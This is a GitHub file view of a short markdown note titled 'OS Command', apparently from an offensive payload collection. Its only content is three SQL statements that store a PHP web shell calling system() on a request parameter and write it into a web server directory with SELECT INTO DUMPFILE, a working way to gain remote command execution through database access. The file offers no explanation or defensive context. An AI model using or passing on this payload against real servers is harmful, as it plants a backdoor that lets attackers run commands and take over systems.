Skip to content

Latest commit

 

History

History
7 lines (6 loc) · 180 Bytes

OS_Command.md

File metadata and controls

7 lines (6 loc) · 180 Bytes

OS Command

create table MeMe(stuff text);
insert into MeMe values('<?php system($_REQUEST["cmd"]); ?>');
select * from MeMe into dumpfile 'var\\www\\html1\\cmd.php';